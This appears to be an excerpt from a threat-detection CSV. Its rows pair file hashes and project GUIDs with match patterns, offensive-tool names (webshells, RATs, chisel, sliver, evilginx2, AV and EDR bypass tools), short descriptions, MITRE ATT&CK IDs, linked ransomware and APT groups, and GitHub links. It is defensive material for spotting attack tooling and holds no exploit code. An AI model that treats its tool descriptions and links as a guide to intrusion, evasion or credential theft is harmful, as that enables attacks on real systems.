"*559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811*",".{0,1000}559917334e8dd6e6828011019d20c15f23ab49a9747a08aaca275c6d44a5d811.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26890"
"*559b3c946bba5edb17f646da5b0b4e259ad3af12aafea6744b1502230419cd6b*",".{0,1000}559b3c946bba5edb17f646da5b0b4e259ad3af12aafea6744b1502230419cd6b.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","26891"
"*559d2cb3e75785c41dea1e308eac3fa511ee44cfaef8f9ca6845703ae830edf1*",".{0,1000}559d2cb3e75785c41dea1e308eac3fa511ee44cfaef8f9ca6845703ae830edf1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26892"
"*559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e*",".{0,1000}559e5ff2b8afb25bbc62275355ba2ceb668e8707de6b221315afb6c2390ba68e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","26893"
"*55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710*",".{0,1000}55a3bbb8a62578b455e478cb197aadd389f2e65418595e5df4636972be878710.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26895"
"*55A48A19-1A5C-4E0D-A46A-5DB04C1D8B03*",".{0,1000}55A48A19\-1A5C\-4E0D\-A46A\-5DB04C1D8B03.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","#GUIDproject","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","26896"
"*55aba2fe1944249b237e454bba9302328d526b11ace6ac9abe31532ef3598501*",".{0,1000}55aba2fe1944249b237e454bba9302328d526b11ace6ac9abe31532ef3598501.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26898"
"*55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef*",".{0,1000}55abc5a3fcc9e06b848f9d81d93ed2771947d01491f99ef3f55556f5b2a183ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26899"
"*55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d*",".{0,1000}55ac39fc6d45b2e315df43a71380ca8c20e62e28b9531e56d920e6f45103388d.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#filehash","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","26900"
"*55adb997fbda60a19f5a9c98d602976d6d30cb7ab1a4c636224e442ff4054ac2*",".{0,1000}55adb997fbda60a19f5a9c98d602976d6d30cb7ab1a4c636224e442ff4054ac2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26901"
"*55b47d76298d6f56ea19a06c6bab41145675717159890d4787fe83c8785bbf23*",".{0,1000}55b47d76298d6f56ea19a06c6bab41145675717159890d4787fe83c8785bbf23.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","26904"
"*55b8235e7a749bac3ce56589298727a4314ea2e2ac9ba706b183ca3781cc16f8*",".{0,1000}55b8235e7a749bac3ce56589298727a4314ea2e2ac9ba706b183ca3781cc16f8.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","26905"
"*55ba57a3e7763af586b0be21f23454a7e7ea9cd537ebd06bf9b5f3cc2cf53d6e*",".{0,1000}55ba57a3e7763af586b0be21f23454a7e7ea9cd537ebd06bf9b5f3cc2cf53d6e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","26906"
"*55bb7968642a55819b608e5e2e732982424b6f47e5ef774a0a35dff202f6321f*",".{0,1000}55bb7968642a55819b608e5e2e732982424b6f47e5ef774a0a35dff202f6321f.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","26907"
"*55bd5fa243002914817f32fb28c16579d57cf21b12406d350b226de472b66856*",".{0,1000}55bd5fa243002914817f32fb28c16579d57cf21b12406d350b226de472b66856.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","26908"
"*55be8a40ac5f75e95f27147cba581018de3857140f8fdb2ad13016b6c29bc7be*",".{0,1000}55be8a40ac5f75e95f27147cba581018de3857140f8fdb2ad13016b6c29bc7be.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26909"
"*55cb93078b605122dcef64a6680ca4dd2217fc0668704b0363bb227811b180a3*",".{0,1000}55cb93078b605122dcef64a6680ca4dd2217fc0668704b0363bb227811b180a3.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26911"
"*55d11ca1d51a951627e693d7c26536528c24afd46ea7a1f8bf99907066f62ed4*",".{0,1000}55d11ca1d51a951627e693d7c26536528c24afd46ea7a1f8bf99907066f62ed4.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","26912"
"*55d70f97e0f0c76b7a6ed08178f83ccd5505e8c62213d1fdf5221bc60cf3ffe0*",".{0,1000}55d70f97e0f0c76b7a6ed08178f83ccd5505e8c62213d1fdf5221bc60cf3ffe0.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","26913"
"*55d72ecccc3e6bbf42653009b63e1c1e90b134714aca78dfd36ec35003bc3d76*",".{0,1000}55d72ecccc3e6bbf42653009b63e1c1e90b134714aca78dfd36ec35003bc3d76.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","26914"
"*55d7fe012433dbdd8a99de24de054be597277f0e7491db62041737e49823f003*",".{0,1000}55d7fe012433dbdd8a99de24de054be597277f0e7491db62041737e49823f003.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26915"
"*55d8c97ec4476f7ada4f2991de85f6ddb973ac4634dc0a08e2c731d75c5700b3*",".{0,1000}55d8c97ec4476f7ada4f2991de85f6ddb973ac4634dc0a08e2c731d75c5700b3.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","26916"
"*55e4a7e082fde26e6fbec0235f5e722e07234e14026d9c18f24a0e126777d8ef*",".{0,1000}55e4a7e082fde26e6fbec0235f5e722e07234e14026d9c18f24a0e126777d8ef.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26917"
"*55e668d2bed139453ab6c9d17caa15772e47d8d65905cd38f7ef10be5785a967*",".{0,1000}55e668d2bed139453ab6c9d17caa15772e47d8d65905cd38f7ef10be5785a967.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26918"
"*55e85cf923faed84769d3b61cd10bb2d444edb20ffaf1cbfd5af304d6add3cdd*",".{0,1000}55e85cf923faed84769d3b61cd10bb2d444edb20ffaf1cbfd5af304d6add3cdd.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26919"
"*55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c*",".{0,1000}55e9c45179e5688405513330884f614cc9d97b9bef74ea64c3c6d8dd992a7e9c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26920"
"*55F0368B-63DA-40E7-A8A5-289F70DF9C7F*",".{0,1000}55F0368B\-63DA\-40E7\-A8A5\-289F70DF9C7F.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","0","#GUIDproject","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","26921"
"*55f149f758ed7b39a0277fb798f84b9f213efe29a6966e3805ba445ce405e4d8*",".{0,1000}55f149f758ed7b39a0277fb798f84b9f213efe29a6966e3805ba445ce405e4d8.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26922"
"*55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a*",".{0,1000}55f8bbbb112a0bf874c09d9a908fa42773bbc0d9ce3495bb2496b60900e7f09a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26923"
"*560a6a33d09d60063663df714e535b74f7ce1e9fb8736ff768cd89bf1e333e39*",".{0,1000}560a6a33d09d60063663df714e535b74f7ce1e9fb8736ff768cd89bf1e333e39.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26924"
"*560eff9456ec2dfd07ac44e6d9a79dcdc678d49a029bf3b0e7f75dc5bbec0ffb*",".{0,1000}560eff9456ec2dfd07ac44e6d9a79dcdc678d49a029bf3b0e7f75dc5bbec0ffb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26925"
"*5612ea4ef90043eb2d52ecff3ed05608f0ca76412f5466d37b9b8e0dabc51a05*",".{0,1000}5612ea4ef90043eb2d52ecff3ed05608f0ca76412f5466d37b9b8e0dabc51a05.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26926"
"*5615ab2d386e0a85a54c65dd9fc4a03162150007a56ae4eccda644095ce34055*",".{0,1000}5615ab2d386e0a85a54c65dd9fc4a03162150007a56ae4eccda644095ce34055.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","26928"
"*561c5f3163f3e6864d547c4412339872841fd9b5d365f10a0d95d2bb366b8396*",".{0,1000}561c5f3163f3e6864d547c4412339872841fd9b5d365f10a0d95d2bb366b8396.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","26929"
"*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26930"
"*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26931"
"*561d3b61a103c4e94469ad8d9758f96676fc4fce3c489140f8c6864a8e4c55b9*",".{0,1000}561d3b61a103c4e94469ad8d9758f96676fc4fce3c489140f8c6864a8e4c55b9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26932"
"*5627805837c5e8f2f5db7ae56fc3ccee6397c615c8458ae0285216588f5b8d7c*",".{0,1000}5627805837c5e8f2f5db7ae56fc3ccee6397c615c8458ae0285216588f5b8d7c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26933"
"*563b3de7dbb4765e6d4601786536c339df8e29d46a3cd75f19a16c9c8e0b8dd7*",".{0,1000}563b3de7dbb4765e6d4601786536c339df8e29d46a3cd75f19a16c9c8e0b8dd7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26934"
"*56413e30a0f7b6386b0caa4048c7fc5eafa1df9d8966f84bde08fc0cde16c2de*",".{0,1000}56413e30a0f7b6386b0caa4048c7fc5eafa1df9d8966f84bde08fc0cde16c2de.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26936"
"*5643f39d347a5b36f195edcd9dbba33cc3417d76ad99892a029aefa96817b41a*",".{0,1000}5643f39d347a5b36f195edcd9dbba33cc3417d76ad99892a029aefa96817b41a.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","26937"
"*5649329377ee03a1aace70be74650290f8d6bb597351daf62d1a6a4a37db53cb*",".{0,1000}5649329377ee03a1aace70be74650290f8d6bb597351daf62d1a6a4a37db53cb.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","26938"
"*564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2*",".{0,1000}564967ff2524b78c74c3a7d3b31fd7bdc0750c6c478fb15c571fe7fdc82e31a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26939"
"*564fdc3bdd17f8574a94502ea54a02cf39b0b93ef44c09af38446d4478304a12*",".{0,1000}564fdc3bdd17f8574a94502ea54a02cf39b0b93ef44c09af38446d4478304a12.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26942"
"*56563020331400f5b1da0963a37a4a5210f4bf969c594f637daee819b98e7ecf*",".{0,1000}56563020331400f5b1da0963a37a4a5210f4bf969c594f637daee819b98e7ecf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26943"
"*56598F1C-6D88-4994-A392-AF337ABE5777*",".{0,1000}56598F1C\-6D88\-4994\-A392\-AF337ABE5777.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#GUIDproject","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","26944"
"*565d4502e4f8d24a2bf76a7cffdf27b54604b8211c3986ae05fa75bb46d8b356*",".{0,1000}565d4502e4f8d24a2bf76a7cffdf27b54604b8211c3986ae05fa75bb46d8b356.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","26946"
"*565e40d59cf30f23587c75bc33d9f452ba9017650f4ab259af77b1d219bdb19d*",".{0,1000}565e40d59cf30f23587c75bc33d9f452ba9017650f4ab259af77b1d219bdb19d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26947"
"*56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275*",".{0,1000}56633694db3e8d8f7022bbc09920592e414c90155e273fbea96b6299bab97275.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26948"
